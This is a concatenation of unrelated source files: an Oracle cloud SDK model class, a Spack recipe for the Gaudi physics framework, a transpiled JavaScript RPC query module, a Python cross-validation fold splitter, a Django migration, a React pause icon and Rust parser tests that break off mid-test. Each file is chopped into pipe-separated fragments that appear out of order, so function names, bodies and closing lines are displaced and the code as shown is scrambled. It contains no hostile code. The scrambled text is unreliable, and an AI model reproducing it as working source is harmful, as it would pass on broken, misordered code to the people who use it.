:param source_db_system_id: The source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
:type: str
"""
self._source_db_system_id = source_db_system_id
@property
def db_home(self):
"""
**[Required]** Gets the db_home of this LaunchDbSystemFromDbSystemDetails.
:return: The db_home of this LaunchDbSystemFromDbSystemDetails.
:rtype: oci.database.models.CreateDbHomeFromDbSystemDetails
"""
return self._db_home
@db_home.setter
def db_home(self, db_home):
"""
Sets the db_home of this LaunchDbSystemFromDbSystemDetails.
:param db_home: The db_home of this LaunchDbSystemFromDbSystemDetails.
:type: oci.database.models.CreateDbHomeFromDbSystemDetails
"""
self._db_home = db_home
@property
def license_model(self):
"""
Gets the license_model of this LaunchDbSystemFromDbSystemDetails.
The Oracle license model that applies to all the databases on the DB system. The default is LICENSE_INCLUDED.
Allowed values for this property are: "LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"
:return: The license_model of this LaunchDbSystemFromDbSystemDetails.
:rtype: str
"""
return self._license_model
@license_model.setter
def license_model(self, license_model):
"""
Sets the license_model of this LaunchDbSystemFromDbSystemDetails.
The Oracle license model that applies to all the databases on the DB system. The default is LICENSE_INCLUDED.
:param license_model: The license_model of this LaunchDbSystemFromDbSystemDetails.
:type: str
"""
allowed_values = ["LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"]
if not value_allowed_none_or_none_sentinel(license_model, allowed_values):
raise ValueError(
"Invalid value for `license_model`, must be None or one of {0}"
.format(allowed_values)
)
self._license_model = license_model
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | self._defined_tags = None
self._source = None |
package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Gaudi(CMakePackage):
"""An experiment-independent HEP event data processing framework"""
homepage = "http://gaudi.web.cern.ch/gaudi/"
git = "https://gitlab.cern.ch/gaudi/Gaudi.git"
url = "https://gitlab.cern.ch/gaudi/Gaudi/-/archive/v33r1/Gaudi-v33r1.tar.gz"
tags = ['hep']
version('master', branch='master')
version('35.0', sha256='c01b822f9592a7bf875b9997cbeb3c94dea97cb13d523c12649dbbf5d69b5fa6')
version('34.0', sha256='28fc4abb5a6b08da5a6b1300451c7e8487f918b055939877219d454abf7668ae')
version('33.2', sha256='26aaf9c4ff237a60ec79af9bd18ad249fc91c16e297ba77e28e4a256123db6e5')
version('33.1', sha256='7eb6b2af64aeb965228d4b6ea66c7f9f57f832f93d5b8ad55c9105235af5b042')
version('33.0', sha256='76a967c41f579acc432593d498875dd4dc1f8afd5061e692741a355a9cf233c8')
version('32.2', sha256='e9ef3eb57fd9ac7b9d5647e278a84b2e6263f29f0b14dbe1321667d44d969d2e')
version('31.0', commit='aeb156f0c40571b5753a9e1dab31e331491b2f3e')
version('30.5', commit='2c70e73ee5b543b26197b90dd59ea4e4d359d230')
maintainers = ['drbenmorgan', "vvolkl"]
variant('optional', default=False,
description='Build most optional components and tests')
variant('docs', default=False,
description='Build documentation with Doxygen')
variant('vtune', default=False,
description='Build with Intel VTune profiler support')
# only build subdirectory GaudiExamples when +optional
patch("build_testing.patch", when="@:34.99")
# fixes for the cmake config which could not find newer boost versions
patch("link_target_fixes.patch", when="@33.0:34.99")
patch("link_target_fixes32.patch", when="@:32.2")
# These dependencies are needed for a minimal Gaudi build
depends_on('aida')
depends_on('[email protected]: +python')
depends_on('clhep')
depends_on('cmake', type='build')
depends_on('cppgsl')
depends_on('fmt', when='@33.2:')
depends_on('intel-tbb')
depends_on('libuuid')
depends_on('nlohmann-json', when="@35.0:")
depends_on('python', type=('build', 'run'))
depends_on('python@:3.7.99', when='@32.2:34.99', type=('build', 'run'))
depends_on('python@:2.99.99', when='@:32.1', type=('build', 'run'))
depends_on('py-setuptools@:45.99.99', when='^python@:2.7.99', type='build')
depends_on('py-six', type=('build', 'run')) |
# todo: this should be a test dependency only,
depends_on('py-nose', when="@35.0", type=('build', 'run'))
# Adding these dependencies triggers the build of most optional components
depends_on('cppgsl', when='+optional')
depends_on('cppunit', when='+optional')
depends_on('doxygen +graphviz', when='+docs')
depends_on('gperftools', when='+optional')
depends_on('gdb', when='+optional')
depends_on('gsl', when='+optional')
depends_on('heppdt@:2.99.99', when='+optional')
depends_on('jemalloc', when='+optional')
depends_on('libpng', when='+optional')
depends_on('libunwind', when='+optional')
depends_on('py-networkx@:2.2', when='+optional ^python@:2.7.99')
depends_on('py-networkx', when='+optional ^[email protected]:')
depends_on('py-setuptools', when='+optional')
depends_on('py-nose', when='+optional')
depends_on('relax', when='@:33.99 +optional')
depends_on('xerces-c', when='+optional')
# NOTE: pocl cannot be added as a minimal OpenCL implementation because
# ROOT does not like being exposed to LLVM symbols.
# The Intel VTune dependency is taken aside because it requires a license
depends_on('intel-parallel-studio -mpi +vtune', when='+vtune')
def cmake_args(self):
args = [
self.define_from_variant("BUILD_TESTING", "optional"),
self.define_from_variant("GAUDI_USE_AIDA", "optional"),
self.define_from_variant("GAUDI_USE_CPPUNIT", "optional"),
self.define_from_variant("GAUDI_USE_HEPPDT", "optional"),
self.define_from_variant("GAUDI_USE_JEMALLOC", "optional"),
self.define_from_variant("GAUDI_USE_UNWIND", "optional"),
self.define_from_variant("GAUDI_USE_XERCESC", "optional"),
self.define_from_variant("GAUDI_USE_DOXYGEN", "docs"),
# needed to build core services like rndmsvc
self.define("GAUDI_USE_CLHEP", True),
self.define("GAUDI_USE_PYTHON_MAJOR",
str(self.spec['python'].version.up_to(1))),
# todo:
self.define("GAUDI_USE_INTELAMPLIFIER", False),
self.define("GAUDI_USE_GPERFTOOLS", False), ]
# this is not really used in spack builds, but needs to be set
if self.spec.version < Version('34.99'):
args.append("-DHOST_BINARY_TAG=x86_64-linux-gcc9-opt")
return args
def setup_run_environment(self, env):
# environment as in Gaudi.xenv
env.prepend_path('PATH', self.prefix.scripts)
env.prepend_path('PYTHONPATH', self.prefix.python)
env.prepend_path('ROOT_INCLUDE_PATH', self.prefix.include)
def url_for_version(self, version):
major = str(version[0])
minor = str(version[1])
url = "https://gitlab.cern.ch/gaudi/Gaudi/-/archive/v{0}r{1}/Gaudi-v{0}r{1}.tar.gz".format(major, minor)
return url | depends_on('py-xenv@1:', type=('build', 'run'))
depends_on('range-v3')
depends_on('root +python +root7 +ssl +tbb +threads')
depends_on('zlib') |
index.js | 'use strict';
var _regenerator = require('babel-runtime/regenerator');
var _regenerator2 = _interopRequireDefault(_regenerator);
var _stringify = require('babel-runtime/core-js/json/stringify');
var _stringify2 = _interopRequireDefault(_stringify);
var _asyncToGenerator2 = require('babel-runtime/helpers/asyncToGenerator');
var _asyncToGenerator3 = _interopRequireDefault(_asyncToGenerator2);
var _defineProperty = require('babel-runtime/core-js/object/define-property');
var _defineProperty2 = _interopRequireDefault(_defineProperty);
var _keys = require('babel-runtime/core-js/object/keys');
var _keys2 = _interopRequireDefault(_keys);
var _assign = require('babel-runtime/core-js/object/assign');
var _assign2 = _interopRequireDefault(_assign);
function | (obj) { return obj && obj.__esModule ? obj : { 'default': obj }; }
var format = require('sofjs-format');
var SofRPC = require('sofjs-rpc');
var promiseToCallback = require('promise-to-callback');
module.exports = Sof;
function Sof(provider, options) {
var self = this;
var optionsObject = options || {};
if (!(this instanceof Sof)) {
throw new Error('[sofjs-query] the Sof object requires the "new" flag in order to function normally (i.e. `const sof = new Sof(provider);`).');
}
if (typeof provider !== 'object') {
throw new Error('[sofjs-query] the Sof object requires that the first input \'provider\' must be an object, got \'' + typeof provider + '\' (i.e. \'const sof = new Sof(provider);\')');
}
self.options = (0, _assign2['default'])({
debug: optionsObject.debug || false,
logger: optionsObject.logger || console,
jsonSpace: optionsObject.jsonSpace || 0
});
self.rpc = new SofRPC(provider);
self.setProvider = self.rpc.setProvider;
}
Sof.prototype.log = function log(message) {
var self = this;
if (self.options.debug) self.options.logger.log('[sofjs-query log] ' + message);
};
(0, _keys2['default'])(format.schema.methods).forEach(function (rpcMethodName) {
(0, _defineProperty2['default'])(Sof.prototype, rpcMethodName.replace('sof_', ''), {
enumerable: true,
value: generateFnFor(rpcMethodName, format.schema.methods[rpcMethodName])
});
});
function generateFnFor(rpcMethodName, methodObject) {
return function outputMethod() {
var performCall = function () {
var _ref = (0, _asyncToGenerator3['default'])( /*#__PURE__*/_regenerator2['default'].mark(function _callee() {
var result, methodOutputs, outputError;
return _regenerator2['default'].wrap(function _callee$(_context) {
while (1) {
switch (_context.prev = _context.next) {
case 0:
if (!(args.length < methodObject[2])) {
_context.next = 2;
break;
}
throw new Error('[sofjs-query] method \'' + protoMethodName + '\' requires at least ' + methodObject[2] + ' input (format type ' + methodObject[0][0] + '), ' + args.length + ' provided. For more information visit: https://octonion.institute/susy-go/wiki/JSON-RPC#' + rpcMethodName.toLowerCase());
case 2:
if (!(args.length > methodObject[0].length)) {
_context.next = 4;
break;
}
throw new Error('[sofjs-query] method \'' + protoMethodName + '\' requires at most ' + methodObject[0].length + ' params, ' + args.length + ' provided \'' + (0, _stringify2['default'])(args, null, self.options.jsonSpace) + '\'. For more information visit: https://octonion.institute/susy-go/wiki/JSON-RPC#' + rpcMethodName.toLowerCase());
case 4:
// set default block
if (methodObject[3] && args.length < methodObject[3]) {
args.push('latest');
}
// format inputs
this.log('attempting method formatting for \'' + protoMethodName + '\' with inputs ' + (0, _stringify2['default'])(args, null, this.options.jsonSpace));
_context.prev = 6;
inputs = format.formatInputs(rpcMethodName, args);
this.log('method formatting success for \'' + protoMethodName + '\' with formatted result: ' + (0, _stringify2['default'])(inputs, null, this.options.jsonSpace));
_context.next = 14;
break;
case 11:
_context.prev = 11;
_context.t0 = _context['catch'](6);
throw new Error('[sofjs-query] while formatting inputs \'' + (0, _stringify2['default'])(args, null, this.options.jsonSpace) + '\' for method \'' + protoMethodName + '\' error: ' + _context.t0);
case 14:
_context.next = 16;
return this.rpc.sendAsync({ method: rpcMethodName, params: inputs });
case 16:
result = _context.sent;
_context.prev = 17;
this.log('attempting method formatting for \'' + protoMethodName + '\' with raw outputs: ' + (0, _stringify2['default'])(result, null, this.options.jsonSpace));
methodOutputs = format.formatOutputs(rpcMethodName, result);
this.log('method formatting success for \'' + protoMethodName + '\' formatted result: ' + (0, _stringify2['default'])(methodOutputs, null, this.options.jsonSpace));
return _context.abrupt('return', methodOutputs);
case 24:
_context.prev = 24;
_context.t1 = _context['catch'](17);
outputError = new Error('[sofjs-query] while formatting outputs from RPC \'' + (0, _stringify2['default'])(result, null, this.options.jsonSpace) + '\' for method \'' + protoMethodName + '\' ' + _context.t1);
throw outputError;
case 28:
case 'end':
return _context.stop();
}
}
}, _callee, this, [[6, 11], [17, 24]]);
}));
return function performCall() {
return _ref.apply(this, arguments);
};
}();
var callback = null; // eslint-disable-line
var inputs = null; // eslint-disable-line
var inputError = null; // eslint-disable-line
var self = this;
var args = [].slice.call(arguments); // eslint-disable-line
var protoMethodName = rpcMethodName.replace('sof_', ''); // eslint-disable-line
if (args.length > 0 && typeof args[args.length - 1] === 'function') {
callback = args.pop();
}
var promise = performCall.call(this);
// if callback provided, convert promise to callback
if (callback) {
return promiseToCallback(promise)(callback);
}
// only return promise if no callback provided
return promise;
};
} | _interopRequireDefault |
jackknife.py | # Random shuffle by sentences instead of samples (predicates).
import math
import os
import random
import sys
from os.path import join
def get_sent_to_samples(input_file):
num_samples = 0
sent2samples = []
fin = open(input_file, 'r')
prev_words = ""
prev_predicate = -1
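# Each input line is assumed to look like "<pred_id> <word_1> ... <word_n> ||| <labels>";
# consecutive samples sharing the same words (with increasing predicate ids)
# are grouped into one sentence.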
for line in fin:
line = line.strip()
line_left = line.split('|||')[0]
pred_id = int(line_left.split()[0])
words = ' '.join(line_left.split()[1:])
if not(words == prev_words and pred_id > prev_predicate):
sent2samples.append([])
prev_predicate = pred_id
prev_words = words
sent2samples[-1].append(num_samples)
num_samples += 1
fin.close()
return (sent2samples, num_samples)
def get_sample_to_folds(sent2samples, num_folds, max_num_dev_sents):
num_sents = len(sent2samples)
num_sents_per_fold = int(math.ceil(1.0 * num_sents / num_folds))
print "Read %d training samples and %d sentences. Splitting to %d folds with %d sentences each."\
% (num_samples, num_sents, num_folds, num_sents_per_fold)
sample2fold_trn = [set() for i in range(num_samples)]
sample2fold_dev = [set() for i in range(num_samples)]
# prd: the entire heldout set.
sample2fold_prd = [set() for i in range(num_samples)]
num_dev_sents = [0 for i in range(num_folds)]
num_trn_samples = [0 for i in range(num_folds)]
num_dev_samples = [0 for i in range(num_folds)]
num_prd_samples = [0 for i in range(num_folds)]
for fid in range(num_folds):
ll = fid * num_sents_per_fold
rr = min(num_sents, ll + num_sents_per_fold)
print fid, ll, rr, rr - ll
for i in range(ll, rr):
sent_id = sent_ids[i]
for sample_id in sent2samples[sent_id]:
# Assign training folds to sample.
for fid2 in range(num_folds):
if fid2 != fid:
sample2fold_trn[sample_id].add(fid2)
num_trn_samples[fid2] += 1
# Assign pred folds to sample.
sample2fold_prd[sample_id].add(fid)
num_prd_samples[fid] += 1
prd_sents = range(ll, rr)
random.shuffle(prd_sents)
for i in range(min(len(prd_sents), max_num_dev_sents)):
sent_id = prd_sents[i]
# Assign dev folds to sample.
for sample_id in sent2samples[sent_id]:
sample2fold_dev[sample_id].add(fid)
num_dev_samples[fid] += 1
num_dev_sents[fid] += 1
print sample2fold_trn[:10]
print sample2fold_dev[:10]
print sample2fold_prd[:10]
print "Num trn samples:", num_trn_samples
print "Num prd samples:", num_prd_samples
print "Num dev samples:", num_dev_samples
return (sample2fold_trn, sample2fold_dev, sample2fold_prd)
def split_file(input_file, output_files, sample2fold):
fin = open(input_file, 'r')
fout = [open(fn, 'w') for fn in output_files]
sample_id = 0
for line in fin:
for fid in sample2fold[sample_id]:
fout[fid].write(line.strip() + "\n")
sample_id += 1
fin.close()
for fo in fout:
fo.close()
if __name__ == '__main__':
RANDOM_SEED = 12345
NUM_FOLDS = 5
MAX_NUM_DEV_SENTS = 5000
input_file = sys.argv[1]
output_dir = sys.argv[2]
sent2samples, num_samples = get_sent_to_samples(input_file)
num_sents = len(sent2samples)
sent_ids = range(num_sents)
random.seed(RANDOM_SEED)
random.shuffle(sent_ids)
sample2fold_trn, sample2fold_dev, sample2fold_prd = get_sample_to_folds(sent2samples,
NUM_FOLDS,
MAX_NUM_DEV_SENTS)
# Output ids
fout_trn_ids = [open(join(output_dir, 'train.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
fout_dev_ids = [open(join(output_dir, 'devel.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
fout_prd_ids = [open(join(output_dir, 'pred.f%02d.ids'%fid), 'w') for fid in range(NUM_FOLDS)]
for sid in range(num_samples):
for fid in sample2fold_trn[sid]:
fout_trn_ids[fid].write("%d\n" % sid)
for fid in sample2fold_dev[sid]:
fout_dev_ids[fid].write("%d\n" % sid)
for fid in sample2fold_prd[sid]:
fout_prd_ids[fid].write("%d\n" % sid)
for fo in fout_trn_ids + fout_dev_ids + fout_prd_ids: | filename = input_file.split('/')[-1].split('.')[0]
print filename
split_file(input_file,
[join(output_dir, '%s.train.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_trn)
split_file(input_file,
[join(output_dir, '%s.devel.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_dev)
split_file(input_file,
[join(output_dir, '%s.pred.f%02d.txt'%(filename,fid)) for fid in range(NUM_FOLDS)],
sample2fold_prd) | fo.close()
# Generate output files. |
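# Hypothetical invocation (Python 2; file and directory names are placeholders):
#   python jackknife.py srl.train.txt folds/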
0075_auto_20170124_1439.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-01-24 13:39
from __future__ import unicode_literals
| from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dynadb', '0074_auto_20170123_1212'),
]
operations = [
migrations.AlterField(
model_name='dyndbefficacy',
name='reference_id_compound',
field=models.ForeignKey(db_column='reference_id_compound', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='dynadb.DyndbCompound'),
),
migrations.AlterField(
model_name='dyndbefficacy',
name='type',
field=models.SmallIntegerField(choices=[(0, 'Full Agonist'), (1, 'Partial Agonist'), (2, 'Antagonist'), (3, 'Inverse Agonist'), (4, 'Other')], default=0),
),
] | |
PauseIcon.js | import * as React from 'react'
export default class PauseIcon extends React.Component {
render () {
return ( | <svg xmlns="http://www.w3.org/2000/svg" xmlnsXlink="http://www.w3.org/1999/xlink" width="40" height="48" viewBox="0 0 40 48">
<g fillRule="evenodd">
<path d="M2 0L14 0C15.1 0 16 0.9 16 2L16 46C16 47.1 15.1 48 14 48L2 48C0.9 48 0 47.1 0 46L0 2C0 0.9 0.9 0 2 0Z" />
<path d="M26 0L38 0C39.1 0 40 0.9 40 2L40 46C40 47.1 39.1 48 38 48L26 48C24.9 48 24 47.1 24 46L24 2C24 0.9 24.9 0 26 0Z" />
</g>
</svg>
)
}
} | |
parser.rs | extern crate cannoli;
use cannoli::lexer::Lexer;
use cannoli::parser;
use cannoli::parser::ast::*;
#[test]
fn keyword_global() {
let stream = Lexer::new("global var1, var2, var3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Global {
names: vec![String::from("var1"), String::from("var2"),
String::from("var3")]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn keyword_nonlocal() {
let stream = Lexer::new("nonlocal var1, var2, var3\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Nonlocal {
names: vec![String::from("var1"), String::from("var2"),
String::from("var3")]
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn pass() {
let stream = Lexer::new("pass;pass;pass;pass\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Pass, Statement::Pass, Statement::Pass, Statement::Pass
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("pass;pass;pass;pass;\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn empty_return() {
let stream = Lexer::new("return\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![Statement::Return { value: None }]
};
assert_eq!(ast, expected);
}
#[test]
fn or_and_test_expr() {
let stream =
Lexer::new("return True or False and False or True and False\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::BoolOp {
op: BoolOperator::Or,
values: vec![
Expression::NameConstant { value: Singleton::True },
Expression::BoolOp {
op: BoolOperator::And,
values: vec![
Expression::NameConstant {
value: Singleton::False },
Expression::NameConstant {
value: Singleton::False },
]
},
Expression::BoolOp {
op: BoolOperator::And,
values: vec![
Expression::NameConstant {
value: Singleton::True},
Expression::NameConstant {
value: Singleton::False },
]
}
]
}) }
]
};
assert_eq!(ast, expected);
}
#[test]
fn comparison() {
let stream = Lexer::new("return True < False > True <= False >= \
True != True in False not in True is False \
is not True\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Compare {
left: Box::new(
Expression::NameConstant { value: Singleton::True }
),
ops: vec![
CmpOperator::LT,
CmpOperator::GT,
CmpOperator::LE,
CmpOperator::GE,
CmpOperator::NE,
CmpOperator::In,
CmpOperator::NotIn,
CmpOperator::Is,
CmpOperator::IsNot
],
comparators: vec![
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
Expression::NameConstant { value: Singleton::False },
Expression::NameConstant { value: Singleton::True },
]
}) }
]
};
assert_eq!(ast, expected);
}
#[test]
fn return_call_expr() {
let stream = Lexer::new("func(x)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("func(x)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
let stream = Lexer::new("func(x, y, z)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("func(x, *y, z)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Name {
id: String::from("x"),
ctx: ExprContext::Load
},
Expression::Starred {
value: Box::new(Expression::Name {
id: String::from("y"),
ctx: ExprContext::Load
}),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("z"),
ctx: ExprContext::Load
}
],
keywords: vec![]
}}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("return func(1, \"test\", True, *d, **e,)\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("func"),
ctx: ExprContext::Load
}),
args: vec![
Expression::Num {n: Number::DecInteger(String::from("1"))},
Expression::Str {s: String::from("test")},
Expression::NameConstant {value: Singleton::True},
Expression::Starred {
value: Box::new(Expression::Name {
id: String::from("d"),
ctx: ExprContext::Load
}),
ctx: ExprContext::Load
}
],
keywords: vec![
Keyword::Keyword {
arg: None,
value: Expression::Name {
id: String::from("e"),
ctx: ExprContext::Load
}
}
]
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn return_nested_call() {
let stream = Lexer::new("return f()()()\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Call {
func: Box::new(Expression::Call {
func: Box::new(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("f"),
ctx: ExprContext::Load
}),
args: vec![],
keywords: vec![]
}),
args: vec![],
keywords: vec![]
}),
args: vec![],
keywords: vec![]
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_1() {
let stream = Lexer::new("return p[0]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Num {
n: Number::DecInteger(String::from("0"))
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_2() {
let stream = Lexer::new("return p[0,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Tuple {
elts: vec![
Expression::Num {
n: Number::DecInteger(String::from("0"))
}
],
ctx: ExprContext::Load
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_3() {
let stream = Lexer::new("return p[0,a]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Index {
value: Expression::Tuple {
elts: vec![
Expression::Num {
n: Number::DecInteger(String::from("0"))
},
Expression::Name {
id: String::from("a"),
ctx: ExprContext::Load
}
],
ctx: ExprContext::Load
}
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
// Add trailing comma, should result in the same AST
let stream = Lexer::new("return p[0,a,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_4() {
let stream = Lexer::new("return p[1:4:-1]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Slice {
lower: Some(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
upper: Some(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
step: Some(Expression::UnaryOp {
op: UnaryOperator::USub,
operand: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
})
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_5() {
let stream = Lexer::new("return p[1:4:-1,]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::ExtSlice {
dims: vec![
Slice::Slice {
lower: Some(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
upper: Some(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
step: Some(Expression::UnaryOp {
op: UnaryOperator::USub,
operand: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
})
}
]
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_6() {
let stream = Lexer::new("return p[:]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::Slice {
lower: None,
upper: None,
step: None
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
}
#[test]
fn slices_and_indexes_7() |
#[test]
fn yield_no_arg() {
let stream = Lexer::new("yield\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield { value: None } }
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_testlist_single() {
let stream = Lexer::new("yield 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield {
value: Some(Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}))
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_testlist_tuple() {
let stream = Lexer::new("yield 1,\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::Yield {
value: Some(Box::new(Expression::Tuple {
elts: vec![Expression::Num {
n: Number::DecInteger(String::from("1"))
}],
ctx: ExprContext::Load
}))
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn yield_from_simple() {
let stream = Lexer::new("yield from 1\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr { value: Expression::YieldFrom {
value: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
})
}}
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise() {
let stream = Lexer::new("raise\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise { exc: None, cause: None }
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise_exc() {
let stream = Lexer::new("raise Exception(\"a\")\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise {
exc: Some(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("a") }],
keywords: vec![]
}),
cause: None
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn raise_exc_from_cause() {
let stream = Lexer::new("raise Exception(\"a\") from Exception(\"b\")\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Raise {
exc: Some(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("a") }],
keywords: vec![]
}),
cause: Some(Expression::Call {
func: Box::new(Expression::Name {
id: String::from("Exception"),
ctx: ExprContext::Load
}),
args: vec![Expression::Str { s: String::from("b") }],
keywords: vec![]
}),
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn dict_creation() {
let stream = Lexer::new("{}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![],
values: vec![]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:b}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Dict {
keys: vec![
Expression::Name { id: String::from("a"),
ctx: ExprContext::Load }
],
values: vec![
Expression::Name { id: String::from("b"),
ctx: ExprContext::Load }
]
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("{a:c, **x, b:d,}\n");
let ast = parser::parse_start_symbol(stream).unwrap();
